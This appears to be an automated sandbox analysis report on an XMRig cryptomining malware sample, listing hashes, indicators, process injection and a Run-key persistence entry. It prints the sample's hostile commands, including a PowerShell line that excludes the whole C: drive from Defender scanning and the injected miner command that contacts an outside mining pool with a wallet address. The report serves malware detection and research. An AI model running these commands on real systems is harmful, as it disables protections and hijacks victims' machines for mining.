xmrig | e4bc0106363b1f9157405ffc64d4c5632f86a86b3e466dfc3f909127049e370c

Analysis

max time kernel
298s
max time network
297s
platform
windows10-1703_x64
resource
win10-20220812-en
resource tags

arch:x64arch:x86image:win10-20220812-enlocale:en-usos:windows10-1703-x64system
submitted
30-11-2022 04:48

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

e4bc0106363b1f9157405ffc64d4c5632f86a86b3e466dfc3f909127049e370c.exe
Size

10KB
MD5

b3014f9ea7de6b7acb56519e9e02a879
SHA1

030cf651b1e0ba2405b758f22d28ca86ed46a1de
SHA256

e4bc0106363b1f9157405ffc64d4c5632f86a86b3e466dfc3f909127049e370c
SHA512

a6d93dd44d3ef34d0dcdab36b72e5b7392681202a528799f4d77831b7b25380a37d6ad0d0bc617bf894cb0cb5344489c6116392134bbdb70433c838f2e27a93a
SSDEEP

192:v7Cja853xv6+bLlllCdA78stYcFmVc03KY:TCjlvXbLdaA7ptYcFmVc03K

Score

10^/10

xmrig miner persistence

Malware Config

Signatures

xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

XMRig Miner payload 6 IoCs

miner

Processes:

resource	yara_rule
behavioral2/memory/3964-237-0x0000000140343234-mapping.dmp	xmrig
behavioral2/memory/3964-236-0x0000000140000000-0x00000001407C9000-memory.dmp	xmrig
behavioral2/memory/3964-238-0x0000000140000000-0x00000001407C9000-memory.dmp	xmrig
behavioral2/memory/3964-239-0x0000000140000000-0x00000001407C9000-memory.dmp	xmrig
behavioral2/memory/3964-241-0x0000000140000000-0x00000001407C9000-memory.dmp	xmrig
behavioral2/memory/3964-243-0x0000000140000000-0x00000001407C9000-memory.dmp	xmrig

Executes dropped EXE 2 IoCs

Processes:

e4bc0106363b1f9157405ffc64d4c5632f86a86b3e466dfc3f909127049e370c.exee4bc0106363b1f9157405ffc64d4c5632f86a86b3e466dfc3f909127049e370c.exe

pid	process
3192	e4bc0106363b1f9157405ffc64d4c5632f86a86b3e466dfc3f909127049e370c.exe
4792	e4bc0106363b1f9157405ffc64d4c5632f86a86b3e466dfc3f909127049e370c.exe

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

e4bc0106363b1f9157405ffc64d4c5632f86a86b3e466dfc3f909127049e370c.exee4bc0106363b1f9157405ffc64d4c5632f86a86b3e466dfc3f909127049e370c.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-2482096546-1136599444-1359412500-1000\Software\Microsoft\Windows\CurrentVersion\Run\Wakyxcujr = "\"C:\\Users\\Admin\\AppData\\Roaming\\Flqkfexqja\\Wakyxcujr.exe\""	e4bc0106363b1f9157405ffc64d4c5632f86a86b3e466dfc3f909127049e370c.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2482096546-1136599444-1359412500-1000\Software\Microsoft\Windows\CurrentVersion\Run\Wakyxcujr = "\"C:\\Users\\Admin\\AppData\\Roaming\\Flqkfexqja\\Wakyxcujr.exe\""	e4bc0106363b1f9157405ffc64d4c5632f86a86b3e466dfc3f909127049e370c.exe

Suspicious use of SetThreadContext 3 IoCs

Processes:

e4bc0106363b1f9157405ffc64d4c5632f86a86b3e466dfc3f909127049e370c.exee4bc0106363b1f9157405ffc64d4c5632f86a86b3e466dfc3f909127049e370c.exee4bc0106363b1f9157405ffc64d4c5632f86a86b3e466dfc3f909127049e370c.exe

description	pid	process	target process
PID 2124 set thread context of 2936	2124	e4bc0106363b1f9157405ffc64d4c5632f86a86b3e466dfc3f909127049e370c.exe	e4bc0106363b1f9157405ffc64d4c5632f86a86b3e466dfc3f909127049e370c.exe
PID 3192 set thread context of 4792	3192	e4bc0106363b1f9157405ffc64d4c5632f86a86b3e466dfc3f909127049e370c.exe	e4bc0106363b1f9157405ffc64d4c5632f86a86b3e466dfc3f909127049e370c.exe
PID 4792 set thread context of 3964	4792	e4bc0106363b1f9157405ffc64d4c5632f86a86b3e466dfc3f909127049e370c.exe	AddInProcess.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Suspicious behavior: EnumeratesProcesses 42 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exee4bc0106363b1f9157405ffc64d4c5632f86a86b3e466dfc3f909127049e370c.exe

pid	process
2360	powershell.exe
2360	powershell.exe
2360	powershell.exe
4592	powershell.exe
4592	powershell.exe
4592	powershell.exe
4960	powershell.exe
4960	powershell.exe
4960	powershell.exe
2792	powershell.exe
2792	powershell.exe
2792	powershell.exe
4040	powershell.exe
4040	powershell.exe
4040	powershell.exe
4792	e4bc0106363b1f9157405ffc64d4c5632f86a86b3e466dfc3f909127049e370c.exe
4792	e4bc0106363b1f9157405ffc64d4c5632f86a86b3e466dfc3f909127049e370c.exe
4792	e4bc0106363b1f9157405ffc64d4c5632f86a86b3e466dfc3f909127049e370c.exe
4792	e4bc0106363b1f9157405ffc64d4c5632f86a86b3e466dfc3f909127049e370c.exe
4792	e4bc0106363b1f9157405ffc64d4c5632f86a86b3e466dfc3f909127049e370c.exe
4792	e4bc0106363b1f9157405ffc64d4c5632f86a86b3e466dfc3f909127049e370c.exe
4792	e4bc0106363b1f9157405ffc64d4c5632f86a86b3e466dfc3f909127049e370c.exe
4792	e4bc0106363b1f9157405ffc64d4c5632f86a86b3e466dfc3f909127049e370c.exe
4792	e4bc0106363b1f9157405ffc64d4c5632f86a86b3e466dfc3f909127049e370c.exe
4792	e4bc0106363b1f9157405ffc64d4c5632f86a86b3e466dfc3f909127049e370c.exe
4792	e4bc0106363b1f9157405ffc64d4c5632f86a86b3e466dfc3f909127049e370c.exe
4792	e4bc0106363b1f9157405ffc64d4c5632f86a86b3e466dfc3f909127049e370c.exe
4792	e4bc0106363b1f9157405ffc64d4c5632f86a86b3e466dfc3f909127049e370c.exe
4792	e4bc0106363b1f9157405ffc64d4c5632f86a86b3e466dfc3f909127049e370c.exe
4792	e4bc0106363b1f9157405ffc64d4c5632f86a86b3e466dfc3f909127049e370c.exe
4792	e4bc0106363b1f9157405ffc64d4c5632f86a86b3e466dfc3f909127049e370c.exe
4792	e4bc0106363b1f9157405ffc64d4c5632f86a86b3e466dfc3f909127049e370c.exe
4792	e4bc0106363b1f9157405ffc64d4c5632f86a86b3e466dfc3f909127049e370c.exe
4792	e4bc0106363b1f9157405ffc64d4c5632f86a86b3e466dfc3f909127049e370c.exe
4792	e4bc0106363b1f9157405ffc64d4c5632f86a86b3e466dfc3f909127049e370c.exe
4792	e4bc0106363b1f9157405ffc64d4c5632f86a86b3e466dfc3f909127049e370c.exe
4792	e4bc0106363b1f9157405ffc64d4c5632f86a86b3e466dfc3f909127049e370c.exe
4792	e4bc0106363b1f9157405ffc64d4c5632f86a86b3e466dfc3f909127049e370c.exe
4792	e4bc0106363b1f9157405ffc64d4c5632f86a86b3e466dfc3f909127049e370c.exe
4792	e4bc0106363b1f9157405ffc64d4c5632f86a86b3e466dfc3f909127049e370c.exe
4792	e4bc0106363b1f9157405ffc64d4c5632f86a86b3e466dfc3f909127049e370c.exe
4792	e4bc0106363b1f9157405ffc64d4c5632f86a86b3e466dfc3f909127049e370c.exe

Suspicious behavior: LoadsDriver 1 IoCs

Processes:

pid process

628

pid	process
628

Suspicious use of AdjustPrivilegeToken 32 IoCs

Processes:

powershell.exee4bc0106363b1f9157405ffc64d4c5632f86a86b3e466dfc3f909127049e370c.exepowershell.exee4bc0106363b1f9157405ffc64d4c5632f86a86b3e466dfc3f909127049e370c.exepowershell.exepowershell.exee4bc0106363b1f9157405ffc64d4c5632f86a86b3e466dfc3f909127049e370c.exepowershell.exee4bc0106363b1f9157405ffc64d4c5632f86a86b3e466dfc3f909127049e370c.exeAddInProcess.exe

description	pid	process
Token: SeDebugPrivilege	2360	powershell.exe
Token: SeDebugPrivilege	2124	e4bc0106363b1f9157405ffc64d4c5632f86a86b3e466dfc3f909127049e370c.exe
Token: SeDebugPrivilege	4592	powershell.exe
Token: SeDebugPrivilege	2936	e4bc0106363b1f9157405ffc64d4c5632f86a86b3e466dfc3f909127049e370c.exe
Token: SeDebugPrivilege	4960	powershell.exe
Token: SeDebugPrivilege	2792	powershell.exe
Token: SeDebugPrivilege	3192	e4bc0106363b1f9157405ffc64d4c5632f86a86b3e466dfc3f909127049e370c.exe
Token: SeDebugPrivilege	4040	powershell.exe
Token: SeIncreaseQuotaPrivilege	4960	powershell.exe
Token: SeSecurityPrivilege	4960	powershell.exe
Token: SeTakeOwnershipPrivilege	4960	powershell.exe
Token: SeLoadDriverPrivilege	4960	powershell.exe
Token: SeSystemProfilePrivilege	4960	powershell.exe
Token: SeSystemtimePrivilege	4960	powershell.exe
Token: SeProfSingleProcessPrivilege	4960	powershell.exe
Token: SeIncBasePriorityPrivilege	4960	powershell.exe
Token: SeCreatePagefilePrivilege	4960	powershell.exe
Token: SeBackupPrivilege	4960	powershell.exe
Token: SeRestorePrivilege	4960	powershell.exe
Token: SeShutdownPrivilege	4960	powershell.exe
Token: SeDebugPrivilege	4960	powershell.exe
Token: SeSystemEnvironmentPrivilege	4960	powershell.exe
Token: SeRemoteShutdownPrivilege	4960	powershell.exe
Token: SeUndockPrivilege	4960	powershell.exe
Token: SeManageVolumePrivilege	4960	powershell.exe
Token: 33	4960	powershell.exe
Token: 34	4960	powershell.exe
Token: 35	4960	powershell.exe
Token: 36	4960	powershell.exe
Token: SeDebugPrivilege	4792	e4bc0106363b1f9157405ffc64d4c5632f86a86b3e466dfc3f909127049e370c.exe
Token: SeLockMemoryPrivilege	3964	AddInProcess.exe
Token: SeLockMemoryPrivilege	3964	AddInProcess.exe

Suspicious use of FindShellTrayWindow 1 IoCs

Processes:

AddInProcess.exe

pid process

3964 AddInProcess.exe

pid	process
3964	AddInProcess.exe

Suspicious use of WriteProcessMemory 36 IoCs

Processes:

description	pid	process	target process
PID 2124 wrote to memory of 2360	2124	e4bc0106363b1f9157405ffc64d4c5632f86a86b3e466dfc3f909127049e370c.exe	powershell.exe
PID 2124 wrote to memory of 2360	2124	e4bc0106363b1f9157405ffc64d4c5632f86a86b3e466dfc3f909127049e370c.exe	powershell.exe
PID 2124 wrote to memory of 4592	2124	e4bc0106363b1f9157405ffc64d4c5632f86a86b3e466dfc3f909127049e370c.exe	powershell.exe
PID 2124 wrote to memory of 4592	2124	e4bc0106363b1f9157405ffc64d4c5632f86a86b3e466dfc3f909127049e370c.exe	powershell.exe
PID 2124 wrote to memory of 2936	2124	e4bc0106363b1f9157405ffc64d4c5632f86a86b3e466dfc3f909127049e370c.exe	e4bc0106363b1f9157405ffc64d4c5632f86a86b3e466dfc3f909127049e370c.exe
PID 2124 wrote to memory of 2936	2124	e4bc0106363b1f9157405ffc64d4c5632f86a86b3e466dfc3f909127049e370c.exe	e4bc0106363b1f9157405ffc64d4c5632f86a86b3e466dfc3f909127049e370c.exe
PID 2124 wrote to memory of 2936	2124	e4bc0106363b1f9157405ffc64d4c5632f86a86b3e466dfc3f909127049e370c.exe	e4bc0106363b1f9157405ffc64d4c5632f86a86b3e466dfc3f909127049e370c.exe
PID 2124 wrote to memory of 2936	2124	e4bc0106363b1f9157405ffc64d4c5632f86a86b3e466dfc3f909127049e370c.exe	e4bc0106363b1f9157405ffc64d4c5632f86a86b3e466dfc3f909127049e370c.exe
PID 2124 wrote to memory of 2936	2124	e4bc0106363b1f9157405ffc64d4c5632f86a86b3e466dfc3f909127049e370c.exe	e4bc0106363b1f9157405ffc64d4c5632f86a86b3e466dfc3f909127049e370c.exe
PID 2124 wrote to memory of 2936	2124	e4bc0106363b1f9157405ffc64d4c5632f86a86b3e466dfc3f909127049e370c.exe	e4bc0106363b1f9157405ffc64d4c5632f86a86b3e466dfc3f909127049e370c.exe
PID 2936 wrote to memory of 4960	2936	e4bc0106363b1f9157405ffc64d4c5632f86a86b3e466dfc3f909127049e370c.exe	powershell.exe
PID 2936 wrote to memory of 4960	2936	e4bc0106363b1f9157405ffc64d4c5632f86a86b3e466dfc3f909127049e370c.exe	powershell.exe
PID 3192 wrote to memory of 2792	3192	e4bc0106363b1f9157405ffc64d4c5632f86a86b3e466dfc3f909127049e370c.exe	powershell.exe
PID 3192 wrote to memory of 2792	3192	e4bc0106363b1f9157405ffc64d4c5632f86a86b3e466dfc3f909127049e370c.exe	powershell.exe
PID 3192 wrote to memory of 4040	3192	e4bc0106363b1f9157405ffc64d4c5632f86a86b3e466dfc3f909127049e370c.exe	powershell.exe
PID 3192 wrote to memory of 4040	3192	e4bc0106363b1f9157405ffc64d4c5632f86a86b3e466dfc3f909127049e370c.exe	powershell.exe
PID 3192 wrote to memory of 4792	3192	e4bc0106363b1f9157405ffc64d4c5632f86a86b3e466dfc3f909127049e370c.exe	e4bc0106363b1f9157405ffc64d4c5632f86a86b3e466dfc3f909127049e370c.exe
PID 3192 wrote to memory of 4792	3192	e4bc0106363b1f9157405ffc64d4c5632f86a86b3e466dfc3f909127049e370c.exe	e4bc0106363b1f9157405ffc64d4c5632f86a86b3e466dfc3f909127049e370c.exe
PID 3192 wrote to memory of 4792	3192	e4bc0106363b1f9157405ffc64d4c5632f86a86b3e466dfc3f909127049e370c.exe	e4bc0106363b1f9157405ffc64d4c5632f86a86b3e466dfc3f909127049e370c.exe
PID 3192 wrote to memory of 4792	3192	e4bc0106363b1f9157405ffc64d4c5632f86a86b3e466dfc3f909127049e370c.exe	e4bc0106363b1f9157405ffc64d4c5632f86a86b3e466dfc3f909127049e370c.exe
PID 3192 wrote to memory of 4792	3192	e4bc0106363b1f9157405ffc64d4c5632f86a86b3e466dfc3f909127049e370c.exe	e4bc0106363b1f9157405ffc64d4c5632f86a86b3e466dfc3f909127049e370c.exe
PID 3192 wrote to memory of 4792	3192	e4bc0106363b1f9157405ffc64d4c5632f86a86b3e466dfc3f909127049e370c.exe	e4bc0106363b1f9157405ffc64d4c5632f86a86b3e466dfc3f909127049e370c.exe
PID 4792 wrote to memory of 3964	4792	e4bc0106363b1f9157405ffc64d4c5632f86a86b3e466dfc3f909127049e370c.exe	AddInProcess.exe
PID 4792 wrote to memory of 3964	4792	e4bc0106363b1f9157405ffc64d4c5632f86a86b3e466dfc3f909127049e370c.exe	AddInProcess.exe
PID 4792 wrote to memory of 3964	4792	e4bc0106363b1f9157405ffc64d4c5632f86a86b3e466dfc3f909127049e370c.exe	AddInProcess.exe
PID 4792 wrote to memory of 3964	4792	e4bc0106363b1f9157405ffc64d4c5632f86a86b3e466dfc3f909127049e370c.exe	AddInProcess.exe
PID 4792 wrote to memory of 3964	4792	e4bc0106363b1f9157405ffc64d4c5632f86a86b3e466dfc3f909127049e370c.exe	AddInProcess.exe
PID 4792 wrote to memory of 3964	4792	e4bc0106363b1f9157405ffc64d4c5632f86a86b3e466dfc3f909127049e370c.exe	AddInProcess.exe
PID 4792 wrote to memory of 3964	4792	e4bc0106363b1f9157405ffc64d4c5632f86a86b3e466dfc3f909127049e370c.exe	AddInProcess.exe
PID 4792 wrote to memory of 3964	4792	e4bc0106363b1f9157405ffc64d4c5632f86a86b3e466dfc3f909127049e370c.exe	AddInProcess.exe
PID 4792 wrote to memory of 3964	4792	e4bc0106363b1f9157405ffc64d4c5632f86a86b3e466dfc3f909127049e370c.exe	AddInProcess.exe
PID 4792 wrote to memory of 3964	4792	e4bc0106363b1f9157405ffc64d4c5632f86a86b3e466dfc3f909127049e370c.exe	AddInProcess.exe
PID 4792 wrote to memory of 3964	4792	e4bc0106363b1f9157405ffc64d4c5632f86a86b3e466dfc3f909127049e370c.exe	AddInProcess.exe
PID 4792 wrote to memory of 3964	4792	e4bc0106363b1f9157405ffc64d4c5632f86a86b3e466dfc3f909127049e370c.exe	AddInProcess.exe
PID 4792 wrote to memory of 3964	4792	e4bc0106363b1f9157405ffc64d4c5632f86a86b3e466dfc3f909127049e370c.exe	AddInProcess.exe
PID 4792 wrote to memory of 3964	4792	e4bc0106363b1f9157405ffc64d4c5632f86a86b3e466dfc3f909127049e370c.exe	AddInProcess.exe

C:\Users\Admin\AppData\Local\Temp\e4bc0106363b1f9157405ffc64d4c5632f86a86b3e466dfc3f909127049e370c.exe
"C:\Users\Admin\AppData\Local\Temp\e4bc0106363b1f9157405ffc64d4c5632f86a86b3e466dfc3f909127049e370c.exe"
1⤵
- Adds Run key to start application
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2124

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" Get-Date
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2360

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAOQAwAA==
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4592

C:\Users\Admin\AppData\Local\Temp\e4bc0106363b1f9157405ffc64d4c5632f86a86b3e466dfc3f909127049e370c.exe
C:\Users\Admin\AppData\Local\Temp\e4bc0106363b1f9157405ffc64d4c5632f86a86b3e466dfc3f909127049e370c.exe
2⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2936

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Start-Sleep -Seconds 3; Set-MpPreference -ExclusionPath C:\
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4960

C:\Users\Admin\AppData\Roaming\e4bc0106363b1f9157405ffc64d4c5632f86a86b3e466dfc3f909127049e370c.exe
C:\Users\Admin\AppData\Roaming\e4bc0106363b1f9157405ffc64d4c5632f86a86b3e466dfc3f909127049e370c.exe
1⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3192

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" Get-Date
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2792

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAOQAwAA==
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4040

C:\Users\Admin\AppData\Roaming\e4bc0106363b1f9157405ffc64d4c5632f86a86b3e466dfc3f909127049e370c.exe
C:\Users\Admin\AppData\Roaming\e4bc0106363b1f9157405ffc64d4c5632f86a86b3e466dfc3f909127049e370c.exe
2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4792

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe -o rx.unmineable.com:3333 -a rx -k -u ETC:0x98C14B013dbEBB69cB8d76CdC98a9bC923bDC378.cpu -p x --cpu-max-threads-hint=50
3⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:3964

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Registry Run Keys / Startup Folder

T1060

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\e4bc0106363b1f9157405ffc64d4c5632f86a86b3e466dfc3f909127049e370c.exe.log
Filesize
1KB

MD5
782642cae2d9f6598fb9eb578b369999

SHA1
f05208eb85a5b790b559526c512b20714f3faeaa

SHA256
3ad964dbd06b3a0107024de29cd3ffbd8e03661e23427c8d3b20376c273e7b25

SHA512
12c3f39bf6c09ef56373d9ed82563cfc8df450b1e3c98f3135c7cb3233a41b56fbc15320614ab4e5a8e7b66e0aaa9394c9e75006981bb6c5718499a67ad198dc

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
Filesize
3KB

MD5
56efdb5a0f10b5eece165de4f8c9d799

SHA1
fa5de7ca343b018c3bfeab692545eb544c244e16

SHA256
6c4e3fefc4faa1876a72c0964373c5fa08d3ab074eec7b1313b3e8410b9cb108

SHA512
91e50779bbae7013c492ea48211d6b181175bfed38bf4b451925d5812e887c555528502316bbd4c4ab1f21693d77b700c44786429f88f60f7d92f21e46ea5ddc

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
b24947b74b4a90a581172e45ee3b3670

SHA1
018cf56303cb5cf4b1999da34dce164a3094090d

SHA256
9447ef9622673dc4f3af0b53a6b42ba2f28207b0421f93236df812591829247a

SHA512
0fb66d4aa6953f63182b5108ec8641fb7c7e6e8dddd3cdd43a52778f8e8dfc47c70a1805fa94b8150c25f411c8eac3c551950d37a7f17080e6caf35006f63b78

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
7d0672afd9e03a14025f1568a560b277

SHA1
4c27f69e4f24da2dfd352da07a5824d6a55c38ab

SHA256
cbe762e6ce95fab559fef261c7ce92342bcb91c61e2cc24d31cde361f7980f83

SHA512
c6a214f127990516e38fd6833d703de385270a01aac484353a166cb413b9fe0177fedc44e8603f53fb86a95b9e43815fdbe53c86227a5f11f533a9c684a09f81

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
c8521d8e7a9dde2ecc1cc01158fcff5f

SHA1
f203630392235a5f877aeb05208bd4395c8e7a8b

SHA256
b82e12fceb38390c45e26797b33d5ff373c8c4c150b1532a0510716ce52d064c

SHA512
1b20dd006d888e8ec8a687d4452af825b15772e93c2fb7fe3f49b09d8cf31b1bce006ac3084873e6e2cbed70049d06e666b80beefb7eff2026731d2b83a2b4dd

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
989B

MD5
a2c588025379443ed2d39b1fcae61c66

SHA1
b4cd7174f5d8e13f86ebc70437d98d8281c9b851

SHA256
8ba6e3732c3a792053e55253ca0efca1cbdb031401d6172feb13b4198479b494

SHA512
2af4e2a5ca88b345486db84e0341e3a23e6ab07b081ce4f912eced20c174a7e637441fbf29918486cfe2e2a419ece4bb78a4feeaa52af4a45bca773a9a468704

Download Submit
C:\Users\Admin\AppData\Roaming\Flqkfexqja\Wakyxcujr.exe
MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
C:\Users\Admin\AppData\Roaming\e4bc0106363b1f9157405ffc64d4c5632f86a86b3e466dfc3f909127049e370c.exe
Filesize
10KB

MD5
b3014f9ea7de6b7acb56519e9e02a879

SHA1
030cf651b1e0ba2405b758f22d28ca86ed46a1de

SHA256
e4bc0106363b1f9157405ffc64d4c5632f86a86b3e466dfc3f909127049e370c

SHA512
a6d93dd44d3ef34d0dcdab36b72e5b7392681202a528799f4d77831b7b25380a37d6ad0d0bc617bf894cb0cb5344489c6116392134bbdb70433c838f2e27a93a

Download Submit
C:\Users\Admin\AppData\Roaming\e4bc0106363b1f9157405ffc64d4c5632f86a86b3e466dfc3f909127049e370c.exe
Filesize
10KB

MD5
b3014f9ea7de6b7acb56519e9e02a879

SHA1
030cf651b1e0ba2405b758f22d28ca86ed46a1de

SHA256
e4bc0106363b1f9157405ffc64d4c5632f86a86b3e466dfc3f909127049e370c

SHA512
a6d93dd44d3ef34d0dcdab36b72e5b7392681202a528799f4d77831b7b25380a37d6ad0d0bc617bf894cb0cb5344489c6116392134bbdb70433c838f2e27a93a

Download Submit
C:\Users\Admin\AppData\Roaming\e4bc0106363b1f9157405ffc64d4c5632f86a86b3e466dfc3f909127049e370c.exe
Filesize
10KB

MD5
b3014f9ea7de6b7acb56519e9e02a879

SHA1
030cf651b1e0ba2405b758f22d28ca86ed46a1de

SHA256
e4bc0106363b1f9157405ffc64d4c5632f86a86b3e466dfc3f909127049e370c

SHA512
a6d93dd44d3ef34d0dcdab36b72e5b7392681202a528799f4d77831b7b25380a37d6ad0d0bc617bf894cb0cb5344489c6116392134bbdb70433c838f2e27a93a

Download Submit
memory/2124-137-0x0000024D38180000-0x0000024D38420000-memory.dmp

Filesize
2.6MB

Download
memory/2124-120-0x0000024D1D9A0000-0x0000024D1D9A6000-memory.dmp

Filesize
24KB

Download
memory/2360-129-0x000001DDF0AA0000-0x000001DDF0B16000-memory.dmp

Filesize
472KB

Download
memory/2360-126-0x000001DDF08F0000-0x000001DDF0912000-memory.dmp

Filesize
136KB

Download
memory/2360-121-0x0000000000000000-mapping.dmp

Download
memory/2792-177-0x0000000000000000-mapping.dmp

Download
memory/2936-155-0x0000000000400000-mapping.dmp

Download
memory/2936-156-0x0000020CAA4C0000-0x0000020CAA560000-memory.dmp

Filesize
640KB

Download
memory/2936-159-0x0000020CAA610000-0x0000020CAA664000-memory.dmp

Filesize
336KB

Download
memory/2936-158-0x0000020CAA5C0000-0x0000020CAA60C000-memory.dmp

Filesize
304KB

Download
memory/2936-154-0x0000000000400000-0x000000000048E000-memory.dmp

Filesize
568KB

Download
memory/2936-157-0x0000020CAA560000-0x0000020CAA5B6000-memory.dmp

Filesize
344KB

Download
memory/3964-236-0x0000000140000000-0x00000001407C9000-memory.dmp

Filesize
7.8MB

Download
memory/3964-240-0x000001D2F8500000-0x000001D2F8520000-memory.dmp

Filesize
128KB

Download
memory/3964-243-0x0000000140000000-0x00000001407C9000-memory.dmp

Filesize
7.8MB

Download
memory/3964-242-0x000001D2F9FD0000-0x000001D2F9FF0000-memory.dmp

Filesize
128KB

Download
memory/3964-237-0x0000000140343234-mapping.dmp

Download
memory/3964-241-0x0000000140000000-0x00000001407C9000-memory.dmp

Filesize
7.8MB

Download
memory/3964-238-0x0000000140000000-0x00000001407C9000-memory.dmp

Filesize
7.8MB

Download
memory/3964-239-0x0000000140000000-0x00000001407C9000-memory.dmp

Filesize
7.8MB

Download
memory/4040-191-0x0000000000000000-mapping.dmp

Download
memory/4592-138-0x0000000000000000-mapping.dmp

Download
memory/4792-234-0x00000157D2BE0000-0x00000157D2C34000-memory.dmp

Filesize
336KB

Download
memory/4792-235-0x00000157D2ED0000-0x00000157D2EE6000-memory.dmp

Filesize
88KB

Download
memory/4792-232-0x0000000000400000-mapping.dmp

Download
memory/4960-160-0x0000000000000000-mapping.dmp

Download